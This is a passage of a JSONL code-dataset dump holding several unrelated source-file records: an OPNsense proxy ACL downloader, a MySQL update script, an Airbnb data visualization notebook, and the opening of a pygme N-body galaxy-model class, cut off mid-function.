clickable=False,\n data='{\"animation\": { \"property\": \"rotation\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 0}}',\n)\nbutton_door = arena.Object(\n objName = \"button_dor\",\n objType=arena.Shape.cube,\n scale=(1,1,1),\n location=(-11,1.6,-3),\n clickable=True,\n callback=door_button_callback,\n color = (255,0, 255)\n)\n \n\nthread = Thread(target = start_serial)\nthread.start()\narena.handle_events()\n\nthread.join()", "sub_path": "misc_files/source_code/ECE202A-main/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.send_alert2", "line_number": 19, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "arena.init", "line_number": 51, "usage_type": "call"}, {"api_name": "arena.EventType", "line_number": 60, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 67, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 69, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 75, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 77, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 86, "usage_type": "call"}, {"api_name": "arena.handle_events", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "604990399", "text": "#!/usr/local/bin/python2.7\n\n\"\"\"\n Copyright (c) 2015 Jos Schellevis - Deciso B.V.\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport urllib2\nimport os\nimport os.path\nimport tarfile\nimport gzip\nimport zipfile\nimport StringIO\nimport syslog\nfrom ConfigParser import ConfigParser\n\nacl_config_fn = ('/usr/local/etc/squid/externalACLs.conf')\nacl_target_dir = ('/usr/local/etc/squid/acl')\nacl_max_timeout = 30\n\nclass ACLDownload(object):\n\n def __init__(self, url, timeout):\n \"\"\" init new\n \"\"\"\n self._url = url\n self._timeout = timeout\n self._source_data = None\n self._target_data = None\n\n def fetch(self):\n \"\"\" fetch (raw) source data into self._source_data\n \"\"\"\n try:\n f = urllib2.urlopen(self._url,timeout = self._timeout)\n self._source_data = f.read()\n f.close()\n except (urllib2.URLError, urllib2.HTTPError, IOError) as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s'%self._url)\n self._source_data = None\n\n def pre_process(self):\n \"\"\" pre process downloaded data, handle compression\n \"\"\"\n if self._source_data is not None:\n # handle compressed data\n if (len(self._url) > 8 and self._url[-7:] == '.tar.gz') \\\n or (len(self._url) > 4 and self._url[-4:] == '.tgz'):\n # source is in tar.gz format, extract all into a single string\n try:\n tf = tarfile.open(fileobj=StringIO.StringIO(self._source_data))\n target_data = []\n for tf_file in tf.getmembers():\n if tf_file.isfile():\n target_data.append(tf.extractfile(tf_file).read())\n self._target_data = ''.join(target_data)\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 4 and self._url[-3:] == '.gz':\n # source is in .gz format unpack\n try:\n gf = gzip.GzipFile(mode='r', fileobj=StringIO.StringIO(self._source_data))\n self._target_data = gf.read()\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 5 and self._url[-4:] == '.zip':\n # source is in .zip format, extract all into a single string\n target_data = []\n with zipfile.ZipFile(StringIO.StringIO(self._source_data),\n mode='r',\n compression=zipfile.ZIP_DEFLATED) as zf:\n for item in zf.infolist():\n target_data.append(zf.read(item))\n self._target_data = ''.join(target_data)\n else:\n self._target_data = self._source_data\n\n def download(self):\n self.fetch()\n self.pre_process()\n\n def is_valid(self):\n \"\"\" did this ACL download successful\n \"\"\"\n if self._target_data is not None:\n return True\n else:\n return False\n\n def get_data(self):\n \"\"\" retrieve data\n \"\"\"\n # XXX: maybe some postprocessing is needed here, all will be used with a squid dstdom_regex tag\n return self._target_data\n\n\n# parse OPNsense external ACLs config\nif os.path.exists(acl_config_fn):\n # create acl directory (if new)\n if not os.path.exists(acl_target_dir):\n os.mkdir(acl_target_dir)\n # read config and download per section\n cnf = ConfigParser()\n cnf.read(acl_config_fn)\n for section in cnf.sections():\n # check if tag enabled exists in section\n if cnf.has_option(section,'enabled'):\n # if enabled fetch file\n target_filename = acl_target_dir+'/'+section\n if cnf.get(section,'enabled')=='1':\n if cnf.has_option(section,'url'):\n download_url = cnf.get(section,'url')\n acl = ACLDownload(download_url, acl_max_timeout)\n acl.download()\n if acl.is_valid():\n output_data = acl.get_data()\n with open(target_filename, \"wb\") as code:\n code.write(output_data)\n elif not os.path.isfile(target_filename):\n # if there's no file available, create an empty one (otherwise leave the last download).\n with open(target_filename, \"wb\") as code:\n code.write(\"\")\n # if disabled or not 1 try to remove old file\n elif cnf.get(section,'enabled')!='1':\n try:\n os.remove(acl_target_dir+'/'+section)\n except OSError:\n pass\n", "sub_path": "src/opnsense/scripts/proxy/fetchACLs.py", "file_name": "fetchACLs.py", "file_ext": "py", "file_size_in_byte": 6201, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib2.urlopen", "line_number": 57, "usage_type": "call"}, {"api_name": "urllib2.URLError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "urllib2.HTTPError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 61, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 73, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 80, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gzip.GzipFile", "line_number": 84, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 84, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 87, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 87, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 91, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 123, "usage_type": "call"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "145311008", "text": "# -*- coding: utf-8 -*-\r\nimport re,pymysql\r\nconnection = pymysql.connect(host='127.0.0.1',port=3306,user='root',password='*',db='ysdd',charset='utf8')\r\ncursor = connection.cursor()\r\nsql=\"select ROE,ycpdays,cpdays,realid from cpgz where red=1 and zf=1\"\r\ncursor.execute(sql)\r\ndates = cursor.fetchall()\r\nfor date in dates:\r\n dalygrade = float(date[0][:-1]) / date[1]\r\n ROE = dalygrade * date[2]\r\n parameter = 0.3 + (date[2] / 5) * 0.5\r\n gROE = (ROE*1.113-parameter)*0.19+parameter if ROE*1.1113 > parameter else parameter\r\n wgROE = (ROE*1.113-parameter)*0.2+parameter if ROE*1.1113 > parameter else parameter\r\n fxROE = 10 * ROE - 9 * wgROE\r\n sql=\"update cpgz set dalygrade=%0.4f,gROE=%0.4f,ROE='%0.2f%%' where realid='%s'\" %(dalygrade,gROE,ROE,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\n sql = \"select stocks from hzb where realid='%s'\" %(date[3])\r\n cursor.execute(sql)\r\n stocks = cursor.fetchone()\r\n money = stocks[0] * (100+ROE) * 100\r\n sql=\"update hzb set investor='%0.2f%%',trader='%0.2f%%',money=%d where realid='%s'\" %(gROE,fxROE,money,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\nconnection.close()\r\n \r\n \r\n\r\n \r\n \r\n", "sub_path": "cpxz.py", "file_name": "cpxz.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymysql.connect", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "434590240", "text": "\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Draw inline\nget_ipython().magic(u'matplotlib inline')\n\n# Set figure aesthetics\nsns.set_style(\"white\", {'ytick.major.size': 10.0})\nsns.set_context(\"poster\", font_scale=1.1)\n\n\n# In[2]:\n\n# Load the data into DataFrames\ntrain_users = pd.read_csv('../input/train_users_2.csv')\ntest_users = pd.read_csv('../input/test_users.csv')\n\n\n# In[4]:\n\nprint(train_users.shape[0],test_users.shape[0])\n\n\n# In[6]:\n\n# Merge train and test users\nusers = pd.concat((train_users, test_users), axis=0, ignore_index=True)\n\n# Remove ID\nusers.drop('id',axis=1, inplace=True)\n\nusers.head(10)\n\n\n# In[6]:\n\nusers.gender.replace('-unknown-', np.nan, inplace=True)\n\n\n# In[15]:\n\nusers_nan = (users.isnull().sum() / users.shape[0]) * 100\nusers_nan[users_nan > 0].drop('country_destination')\n\n\n# In[18]:\n\n#check\nprint(int((train_users.date_first_booking.isnull().sum() / train_users.shape[0]) * 100))\n\n\n# In[19]:\n\nusers.age.describe()\n\n\n# In[20]:\n\nprint(sum(users.age > 100))\nprint(sum(users.age < 18))\n\n\n# In[21]:\n\nusers[users.age > 100]['age'].describe()\n\n\n# In[22]:\n\nusers[users.age < 18]['age'].describe()\n\n\n# In[23]:\n\nusers.loc[users.age > 95, 'age'] = np.nan\nusers.loc[users.age < 13, 'age'] = np.nan\n\n\n# In[24]:\n\ncategorical_features = [\n 'affiliate_channel',\n 'affiliate_provider',\n 'country_destination',\n 'first_affiliate_tracked',\n 'first_browser',\n 'first_device_type',\n 'gender',\n 'language',\n 'signup_app',\n 'signup_method'\n]\n\nfor categorical_feature in categorical_features:\n users[categorical_feature] = users[categorical_feature].astype('category')\n\n\n# In[25]:\n\nusers['date_account_created'] = pd.to_datetime(users['date_account_created'])\nusers['date_first_booking'] = pd.to_datetime(users['date_first_booking'])\nusers['date_first_active'] = pd.to_datetime((users.timestamp_first_active // 1000000), format='%Y%m%d')\n\n\n# In[26]:\n\nseries = pd.Series(users.gender.value_counts(dropna=False))\n\n\n# In[28]:\n\nseries.plot.pie(figsize=(5, 5))\n\n\n# In[37]:\n\nwomen = sum(users['gender'] == 'FEMALE')\nmen = sum(users['gender'] == 'MALE')\n\nfemale_destinations = users.loc[users['gender'] == 'FEMALE', 'country_destination'].value_counts() / women * 100\nmale_destinations = users.loc[users['gender'] == 'MALE', 'country_destination'].value_counts() / men * 100\n\n# Bar width\nwidth = 0.4\n\nmale_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Male', rot=0)\nfemale_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Female', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[42]:\n\ndestination_percentage = users.country_destination.value_counts() / users.shape[0] * 100\ndestination_percentage.plot(kind='bar',color='#20B2AA', rot=0)\n# Using seaborn to plot\nsns.countplot(x=\"country_destination\", data=users, order=list(users.country_destination.value_counts().keys()))\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n# sns.despine()\n\n\n# In[44]:\n\nsns.kdeplot(users.age.dropna(), color='#20B2AA', shade=True)\nplt.xlabel('Age')\nplt.ylabel('Distribution of age')\nsns.despine()\n\n\n# In[45]:\n\nage = 40\n\nyounger = sum(users.loc[users['age'] < age, 'country_destination'].value_counts())\nolder = sum(users.loc[users['age'] > age, 'country_destination'].value_counts())\n\nyounger_destinations = users.loc[users['age'] < age, 'country_destination'].value_counts() / younger * 100\nolder_destinations = users.loc[users['age'] > age, 'country_destination'].value_counts() / older * 100\n\nyounger_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Youngers', rot=0)\nolder_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Olders', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[50]:\n\ndf=users.date_account_created.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('First create account')\n\n\n# In[51]:\n\ndf=users.date_first_active.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('Fisrt active account')\n\n", "sub_path": "Visualization.py", "file_name": "Visualization.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "seaborn.set_style", "line_number": 15, "usage_type": "call"}, {"api_name": "seaborn.set_context", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 108, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "seaborn.kdeplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}]} +{"seq_id": "296870774", "text": "try:\n import numpy as np\nexcept ImportError:\n raise Exception(\"numpy is required for pygme\")\n\nfrom numpy import asarray\nfrom numpy import cos, sin, sqrt, arctan\n\ntry:\n from scipy import interpolate\nexcept ImportError:\n raise Exception(\"scipy is required for pygme\")\n\nimport os\nfrom .rwcfor import floatMGE\nfrom pygme.dynMGE import dynMGE\nfrom pygme.paramMGE import dynParamMGE\nfrom pygme.mge_miscfunctions import sample_trunc_r2gauss, sample_trunc_gauss\n\n__version__ = '2.0.4 (24/10/2014)' # Changed default value for SigmaGas and fixed comment in realise_Nbody\n#__version__ = '2.0.3 (21/08/2013)' \n#__version__ = '2.0.2 (16/01/2013)'\n# Version 2.0.3: Changed imin imax into ilist\n# Version 2.0.2: 16/01/2013 - Simplification in the derivation of sigR, sigZ, sigTheta\n# Version 2.0.1: 18/12/2012 - Adding the FacBetaEps factor as a parameter of the realise_Nbody routine\n\nclass nbodyMGE(dynMGE) :\n def __init__(self, infilename=None, indir=None, saveMGE=None, **kwargs) :\n dynMGE.__init__(self, infilename=infilename, indir=indir, saveMGE=saveMGE, **kwargs)\n\n########################################### N BODY #############################################\n ################################################################\n ### Generate N bodies consistent with the existing MGE model ###\n ################################################################\n def realise_Nbody(self, **kwargs):\n \"\"\" Generate particles within the potential defined by the MGE model\n Cuts in R and Z, in pc, are defined by Rcut and Zcut\n The number of particles and the way the particles have their\n dynamics derived is specified in the Ascii input MGE model\n (e.g. NGROUP, NDYNCOMP, NPARTGROUP1, 2, ...)\n Anisotropy can be specified in the input Ascii Model with\n numbers (if negative, the Spin will be reversed), 'epicycle' or 'betaeps'\n Rcut: cut in R, in pc - default is 50000\n Zcut: cut in Z, in pc - default is 50000\n mcut: cut in ellipsoidal coordinates, in pc (think of this as an ellipsoid with major-axis max radius = mcut )\n Default is 50000\n ComputeV: Boolean (True/False), if True (default) velocities are derived, otherwise only the positions\n GasDisk: Boolean (True/False), if True (default) the Gas component will have velocities compatible with a thin disk\n Otherwise, we will follow the prescription given by the kRZ and kRTheta components in the mge file\n SigmaGas: SigmaR, SigmaTheta and SigmaZ for the Gas, in km/s - default to 10 km/s for all 3 values\n TruncationMethod : Method to sample the positions.\n \"Ellipsoid\" (default): will follow the isosurface of each Gaussians at that radius as a cut\n mcut will be used (in pc)\n \"Cylindre\" means an R, Z Cylindrical cal (Rcut, Zcut will be used - in pc)\n Add_BHParticle : boolean, if defined (Default is True):\n True means that a BH particle is added if Mbh > 0\n False means that if Mbh > 0, the potential will take it\n into account but no particle is added\n Softening: in pc, softening added in quadrature to the gaussian Sigmas for the potential, Default is 0 (no softening)\n FacBetaEps : factor involved when using the BETAEPS option as an anisotropy parameter for the\n Gaussians. When one of the Gaussian component is using BETAEPS for K_R_Z, we fix the\n anisotropy to -> delta = FacBetaEps * Epsilon where delta = 1 - Sigma_Z^2/Sigma_R^2 and\n Epsilon is the intrinsic ellipticity of that Gaussian. Setting FacBetaEps >= 0.8 is not\n permitted (as this would break the requirement on the second order moments).\n\n verbose: default is 1, will print some more information\n \"\"\"\n import time\n\n ## Checking a Few things before starting ########################\n if self.nGauss <= 0 :\n print('ERROR: NGAUSS is not right (= %d)' %self.nGauss)\n return\n if self.TtruncMass <= 0:\n print('ERROR: Mass of the model (= %g) is not right' %self.TtruncMass)\n return\n opGAS = (self.nGasGauss != 0)\n opSTAR = (self.nStarGauss != 0)\n opHALO = (self.nHaloGauss != 0)\n\n ## Number of Groups -------------------------##\n if self.nGroup == 0:\n print(\"ERROR: nGroup is 0\")\n return\n if self.nDynComp == 0:\n print(\"ERROR: nDynComp is 0\")\n return\n\n ## Some options from kwargs -- INITIALISATION -------------------------------------- ##\n ##--- Compute only positions or also velocities ? ---##\n ComputeV = kwargs.get('ComputeV', True)\n GasDisk = kwargs.get('GasDisk', True)\n ## Get the dispersion for the gas in km/s -----------##\n (self.SigRGas, self.SigThetaGas, self.SigZGas) = kwargs.get('SigmaGas',(10.0,10.0,10.0))\n ## Add a BH particle or not? --- ##\n self.Add_BHParticle = kwargs.get('Add_BHParticle', True)\n ## Overwrite mode : 'o' or None ------------------------ ##\n self.overwrite = kwargs.get('overwrite', None)\n ## First Realised Particle, and Max number of Particle -- ##\n self.FirstRealisedPart = np.int(kwargs.get('FirstRealisedPart', 0))\n self.nMaxPart = np.int(kwargs.get('nMaxPart', 0))\n ## Softening -- default is 0 (no softening)--------- ##\n self.Softening = kwargs.get('Softening', 0.0)\n ## Verbose: default is 1 ----------##\n verbose = kwargs.get('verbose', 1)\n ## -------------------------------------------------------------------------------------##\n\n ## Softening in pc----------------------------------##\n if self.Softening > 0. :\n print(\"WARNING: Softening will be %g (pc) !!!\"%(self.Softening))\n self.Softarc = self.Softening / self.pc_per_arcsec # Softening in Arcseconds\n self.SoftarcMbh = self.Softarc # best approx for Mbh smoothing\n self.SoftarcMbh2 = self.SoftarcMbh**2\n\n ## -- Method for Truncating the Density distribution of particles ---##\n self.TruncationMethod = kwargs.get('TruncationMethod', 'Ellipsoid')\n if self.TruncationMethod == \"Cylindre\" :\n self.Rcut = kwargs.get('Rcut', 50000)\n self.Zcut = kwargs.get('Zcut', 50000)\n Xcut = self.Rcut\n self.Rcutarc = self.Rcut / self.pc_per_arcsec\n self.Zcutarc = self.Zcut / self.pc_per_arcsec\n elif self.TruncationMethod == \"Ellipsoid\" :\n self.mcut = kwargs.get('mcut', 50000)\n Xcut = self.mcut\n self.mcutarc = self.mcut / self.pc_per_arcsec\n else :\n print(\"ERROR: TruncationMethod should be Cylindre or Ellipsoid. not %s\" %(self.TruncationMethod))\n return\n\n ## We first save the MGE file for archival purposes, as well as the initial parameters\n self.RealisationTime = time.time()\n dest_filename = self.saveMGE + \"/\" + \"%s_\"%(str(self.RealisationTime)) + self.MGEname\n if os.path.isfile(dest_filename) & (str(self.overwrite).lower() != \"o\") :\n print(\"ERROR: filename already exists in Archival Directory %s\"%(dest_filename))\n print(\" Please use overwrite mode (O) or provide a different output directory (saveMGE)\")\n return\n os_command = \"cp %s %s\"%(self.fullMGEname, dest_filename)\n os.system(os_command)\n #--------------------------------------------------------------------------------------#\n\n ## Save the command into a file with the same time\n text = \"init_nbody(Rcut=%g, Zcut=%g, mcut=%g, ComputeV=%d, GasDisk=%s, SigRGas=%g, SigThetaGas=%g, SigZGas=%g, TruncationMethod=%s, Add_BHParticle=%r, FirstRealisedPart=%r, nMaxPart=%r, overwrite=%r)\\n\"%(self.Rcut, self.Zcut, self.mcut, ComputeV, GasDisk, self.SigRGas, self.SigThetaGas, self.SigZGas, self.TruncationMethod, self.Add_BHParticle, self.FirstRealisedPart, self.nMaxPart, self.overwrite)\n fout = open(self.saveMGE + \"/\" + \"%s\"%(str(self.RealisationTime)) + \".MGE_CI\", \"w+\")\n fout.write(text)\n fout.close()\n #-------------------------------------------------#\n\n ## Get all parameters right and the number of particles too\n self._comp_Nparticles()\n\n #==============================================================================================================\n ## End of parameter initialisation\n #==============================================================================================================\n ## Beginning of allocation\n #==============================================================================================================\n\n self.R = np.zeros(self.nRealisedPart, floatMGE)\n self.theta = np.zeros(self.nRealisedPart, floatMGE)\n self.z = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.x = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.y = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.BodGroup = np.zeros(self.nRealisedPart, int)\n self.BodGauss = np.zeros(self.nRealisedPart, int)\n self.BodMass = np.zeros(self.nRealisedPart, floatMGE)\n ## Add the mass of the particle at 0,0,0 0,0,0 (last particle)\n if self.nRealisedPartBH == 1 :\n self.BodMass[-1] = self.Mbh\n\n ## Allocation for particles dynamics ############################\n self.NSpin = np.ones(self.nRealisedPart, floatMGE)\n self.NkRTheta = np.zeros(self.nRealisedPart, floatMGE)\n self.NkRZ = np.zeros(self.nRealisedPart, floatMGE)\n\n # Now: how do we derive sigma_R or sigma_Theta\n if self.epicycle.any() : ## Theta will be derived from sigma_R with the epicycle approximation\n R = np.linspace(0., Xcut, 1000) ## Derive a range of R in parsec\n epiratio = self.EpicycleRatio(R / self.pc_per_arcsec) # R is passed in arcsec\n # Function to have from R in pc, sigma_R / sigma_Theta from the epicycle approximation\n funcEpiratio = interpolate.interp1d(R, epiratio)\n\n ## Now we implement (if betaeps=1) the relation beta = 0.6 * eps\n ## Only if specified\n if 'FacBetaEps' in kwargs :\n self.FacBetaEps = kwargs.get('FacBetaEps', 0.6)\n self._init_BetaEps(verbose=True)\n\n ## Derive required values from the anisotropy kRZ2 (sig_R2/ sig_z2)\n self._dParam = dynParamMGE(self)\n\n ############### Computing POSITIONS for the N body realisation ##################\n # for each Gaussian, derive initial positions for particles\n ## Only do this if it is axisymmetric\n if self.axi == 1 :\n\n ##################################### BEGIN STARS, GAS, HALO ######################################\n self.Spin = np.ones(self.nGauss, np.int)\n for i in range(self.nGauss) :\n sigma = self.Sig3D[i]\n\n if self.TruncationMethod == \"Cylindre\" :\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n sigma = self.Sig3D[i]*self.QxZ[i]\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Zcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = asarray(np.random.uniform(0., 2.*np.pi, size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n elif self.TruncationMethod == \"Ellipsoid\" :\n r = sample_trunc_r2gauss(sigma=sigma, cutr=self.mcut, npoints=self.nRealisedPartGauss[i])\n U = asarray(np.random.uniform(-1., 1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n V = asarray(np.random.uniform(0.,1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n sqU = np.sqrt(1. - U*U)\n theta = 2. * np.pi * V\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*cos(theta)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*sin(theta)\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r * U * self.QxZ[i]\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = theta\n\n self.BodGauss[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = i+1\n self.BodGroup[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.GaussDynCompNumber[i]\n self.BodMass[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.pmassGauss[i]\n\n ## We set up things so that at the end we have kRZ and kRTheta\n ## First we test if one of the set up variable is negative, which means that we should inverse the Spin\n if (self.kRTheta[i] < 0) :\n self.kRTheta[i] = np.abs(self.kRTheta[i])\n self.Spin[i] = -1\n self.NSpin[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = - np.ones(self.nRealisedPartGauss[i], dtype=floatMGE)\n\n self.NkRZ[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRZ[i]\n if self.epicycle[i] :\n 